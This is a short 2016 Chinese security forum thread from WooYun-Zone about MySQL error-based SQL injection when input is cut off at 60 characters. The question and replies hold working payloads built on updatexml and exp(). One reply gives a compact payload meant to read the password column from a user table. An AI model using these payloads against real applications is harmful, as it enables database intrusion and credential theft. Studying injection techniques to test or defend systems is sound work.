Mysql报错注入,长度限制

  • A+
所属分类:WooYun-Zone

1'and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#

1'and Exp(~(select*from(select @@version)a))#

都是能注出数据的

但是程序限制了60个字符,多出的直接截断

表名14个字符:0123456789user

字段8个字符:password

能不能构造读出数据的exp?

  1. 1#

    狗狗侠 | 2016-03-30 17:29

    大侠,substring函数

  2. 2#

    书生 (WooYun(白帽子技术社区)) | 2016-03-30 17:41

    @狗狗侠 我的意思是限制了输入的注入语句字符,不是返回的数据字符

  3. 3#

    mramydnei (一个逗逼运维) | 2016-03-30 20:26

    本地测试成功,但没能解决楼主的问题。分享一下思路哈

    '^updatexml(1,(select max(password)from 0123456789user),1)#

    Mysql报错注入,长度限制

  4. 4#

    书生 (WooYun(白帽子技术社区)) | 2016-03-30 20:41

    估计也就这样了,感谢M锅

  5. 5#

    牛 小 帅 (心若没有栖息的地方走到哪里都是在流浪!) | 2016-03-30 21:14

    @mramydnei m锅  加个联系方式呗 我要学习学习

  6. 6#

    Joe | 2016-03-31 00:27

    @mramydnei  ‘^updatexml(1,(select max(password)from 0123456789user),1)# 为什么不行 不应该啊